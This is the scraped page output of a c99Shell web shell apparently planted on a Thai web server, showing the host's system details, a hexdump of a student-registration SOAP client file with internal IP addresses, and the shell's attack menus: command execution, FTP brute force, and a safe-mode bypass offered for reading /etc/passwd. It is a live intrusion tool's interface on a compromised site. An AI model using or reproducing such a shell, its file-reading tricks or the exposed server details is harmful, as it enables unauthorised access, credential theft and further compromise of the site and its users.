!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/ws_standard_on_reg/   drwxr-xr-x
Free 52.61 GB of 127.8 GB (41.17%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     callwebservice.php (661 B)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
Information:
Path /var/www/html/ws_standard_on_reg/callwebservice.php
Size 661 B
MD5 2b692b32f6f742db55958aed28a78cf9
Owner/Group root/root
Perms-rw-r--r--
Create time 06/07/2011 02:01:07
Access time 11/07/2024 15:58:38
MODIFY time 19/06/2009 09:22:25

FULL HEXDUMP
00000000
00000018
00000030
00000048
00000060
00000078
00000090
000000A8
000000C0
000000D8
000000F0
00000108
00000120
00000138
00000150
00000168
00000180
00000198
000001B0
000001C8
000001E0
000001F8
00000210
00000228
00000240
00000258
00000270
00000288
0D 0A 3C 3F 70 68 70 0D 0A 72 65 71 75 69 72 65 5F 6F 6E 63 65 28 27 6E
75 73 6F 61 70 2E 70 68 70 27 29 3B 0D 0A 3F 3E 0D 0A 0D 0A 3C 3F 70 68
70 20 0D 0A 24 74 65 72 6D 5F 64 61 74 65 5F 65 6E 64 3D 27 32 35 35 31
2D 30 35 2D 33 31 27 3B 0D 0A 2F 2F 24 74 65 72 6D 5F 64 61 74 65 5F 65
6E 64 3D 27 32 35 35 30 2D 30 39 2D 33 30 27 3B 0D 0A 09 09 2F 2F 73 74
6F 72 65 20 53 74 61 74 75 73 0D 0A 09 09 24 73 65 61 72 63 68 5F 6E 75
6D 5F 73 74 75 64 65 6E 74 20 3D 20 22 22 3B 0D 0A 0D 0A 09 09 2F 2F 24
77 73 5F 63 6C 69 65 6E 74 20 3D 20 6E 65 77 20 73 6F 61 70 63 6C 69 65
6E 74 28 22 68 74 74 70 3A 2F 2F 36 31 2E 31 39 2E 32 39 2E 33 30 2F 77
73 5F 73 74 61 6E 64 61 72 64 5F 6F 6E 5F 72 65 67 2F 72 65 67 5F 73 74
61 6E 64 61 72 64 2E 70 68 70 3F 77 73 64 6C 22 2C 74 72 75 65 29 20 3B
0D 0A 09 09 24 77 73 5F 63 6C 69 65 6E 74 20 3D 20 6E 65 77 20 73 6F 61
70 63 6C 69 65 6E 74 28 22 68 74 74 70 3A 2F 2F 35 38 2E 31 34 37 2E 31
30 33 2E 36 37 2F 77 73 5F 73 74 61 6E 64 61 72 64 5F 6F 6E 5F 72 65 67
2F 72 65 67 5F 73 74 61 6E 64 61 72 64 2E 70 68 70 3F 77 73 64 6C 22 2C
74 72 75 65 29 20 3B 0D 0A 0D 0A 09 09 2F 2F 24 72 65 73 75 6C 74 20 3D
20 24 77 73 5F 63 6C 69 65 6E 74 2D 3E 63 61 6C 6C 28 27 6E 75 6D 5F 73
74 75 64 65 6E 74 27 2C 24 73 65 61 72 63 68 5F 6E 75 6D 5F 73 74 75 64
65 6E 74 29 3B 0D 0A 09 09 24 72 65 73 75 6C 74 20 3D 20 24 77 73 5F 63
6C 69 65 6E 74 2D 3E 63 61 6C 6C 28 27 6E 75 6D 5F 73 74 75 64 65 6E 74
27 2C 61 72 72 61 79 28 27 73 65 61 72 63 68 5F 6E 75 6D 5F 73 74 75 64
65 6E 74 27 20 3D 3E 24 73 65 61 72 63 68 5F 6E 75 6D 5F 73 74 75 64 65
6E 74 2C 20 27 73 65 61 72 63 68 5F 74 65 72 6D 5F 64 61 74 65 5F 73 74
61 72 74 27 20 3D 3E 24 74 65 72 6D 5F 64 61 74 65 5F 73 74 61 72 74 2C
20 27 73 65 61 72 63 68 5F 74 65 72 6D 5F 64 61 74 65 5F 65 6E 64 27 20
3D 3E 24 74 65 72 6D 5F 64 61 74 65 5F 65 6E 64 29 29 3B 0D 0A 09 09 65
63 68 6F 22 24 72 65 73 75 6C 74 22 3B 0D 0A 0D 0A 3F 3E 0D 0A 0D 0A 0D
0A 0D 0A 0D 0A 0D 0A 0D 0A 0D 0A 0D 0A
  <?php  require_once('n
usoap.php');  ?>    <?ph
p   $term_date_end='2551
-05-31';  //$term_date_e
nd='2550-09-30';   //st
ore Status   $search_nu
m_student = "";     //$
ws_client = new soapclie
nt("http://61.19.29.30/w
s_standard_on_reg/reg_st
andard.php?wsdl",true) ;
   $ws_client = new soa
pclient("http://58.147.1
03.67/ws_standard_on_reg
/reg_standard.php?wsdl",
true) ;     //$result =
 $ws_client->call('num_s
tudent',$search_num_stud
ent);   $result = $ws_c
lient->call('num_student
',array('search_num_stud
ent' =>$search_num_stude
nt, 'search_term_date_st
art' =>$term_date_start,
 'search_term_date_end' 
=>$term_date_end));   e
cho"$result";    ?>     
             

HEXDUMP: [Full] [Preview]
Base64:
[Encode [+chunk [+chunk+quotes [Decode


:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0082 ]--